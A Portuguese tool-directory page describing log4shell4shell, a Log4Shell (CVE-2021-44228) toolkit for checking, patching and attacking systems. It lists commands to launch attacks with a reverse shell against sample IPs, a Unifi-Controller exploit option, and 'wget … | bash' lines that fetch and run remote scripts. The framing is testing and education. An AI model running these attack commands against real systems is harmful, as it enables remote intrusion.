Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4shell4shell — Log4shell - Multi-Toolkit. Encontre, Corrija e Teste possíveis vulnerabilidades CVE-2021-44228 - fornece um ambiente completo de teste/ataque LOG4SHELL no shell | Kitploit
Ferramentas/GitHubGitHub/suuhm/log4shell4shell
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - Multi-Toolkit. Encontre, Corrija e Teste possíveis vulnerabilidades CVE-2021-44228 - fornece um ambiente completo de teste/ataque LOG4SHELL no shell

Ver Repositório
54há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

log4shell4shell

Log4j - Multiferramenta. Encontre e corrija possíveis vulnerabilidades CVE-2021-44228 - fornece um ambiente completo de teste/ataque LOG4SHELL

Thumb

Recursos

  • Verifique seu sistema Linux/Mac/BSD e Windows quanto a vulnerabilidades CVE-2021-44228
  • Corrija seu sistema excluindo a classe Java log4j / ou definindo algumas variáveis de ambiente
  • Prova de Conceito: você pode executar um servidor spring boot dummy para testar o exploit por conta própria (https://github.com/christophetd/log4shell-vulnerable-app)
  • Você pode executar um ataque contra um IP-Porta desejado e incluir um Comando Base64 / Ou um Reverse Shell simples
  • Varredura completa de faixa de IP por https://github.com/fullhunt/log4j-scan

Como Executar no Linux/Mac/BSD:

Requisitos:

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip
  • Verifique rapidamente seu sistema com este comando de uma linha:

    root@kitploit:~
    wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
    

    Mais Opções

    Execute um ataque de exemplo contra IP: 10.4.4.20 Porta 8080 página de login e adicionalmente um Reverse Proxy Shell:

    root@kitploit:~
    git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
    mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
    ./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
    

    Execute screen -r l4s4s-ldap-srv e/ou screen -r l4s4s-nc-rsh para visualizar algumas informações de ataque no shell do Servidor de Exploit:

    Execute uma varredura completa IP: 10.4.4.20 Porta 8080 e adicionalmente tente todos os testes:

    root@kitploit:~
    ./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
    

    Execute uma Prova de Conceito em um Servidor Tomcat Springboot:

    root@kitploit:~
    ./l4s4s.sh --run-dummy-server && \
    ./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
    

    Execute um Ataque/Verificação de Exploit do Unifi-Controller (em 10.4.4.20:8443):

    root@kitploit:~
    ./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
    

    Todas as Opções Disponíveis

    root@kitploit:~
    _|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
    _|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
    _|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
    _|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
    _|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                              _|
                          _|_|
    
    
     > Executando Log4shell Framework & Check-Toolkit no shell v0.1a (C) 2021 suuhm
    
    Entrada incorreta! Por favor, insira uma destas opções:
    
    Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>
    
                            --get-powershell-finder
                            --check-system
                            --fix-log4j
                            --run-dummy-server <JNDIExploit.*.zip>
                            --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                            --python-scan <command>
    
    

    Como atualizar sua versão do python no linux e/ou macos:

    Basta executar meu script auxiliar (--list-versions): ./python-upgrader.sh

    Como executar no Windows x86 / x64:

    Basta executar no Powershell (modo administrador): .\set_windows_fix.ps1

    Este script é alfa! Então, por favor, me informe se tiver algum problema

    Aviso Legal

    O projeto log4shell4shell é feito apenas para fins educacionais e de teste ético. O uso do log4j-scan para atacar alvos sem consentimento mútuo prévio é ilegal. É de responsabilidade do usuário final obedecer todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não se responsabilizam por qualquer uso indevido ou dano causado por este programa.

    Baixar ferramenta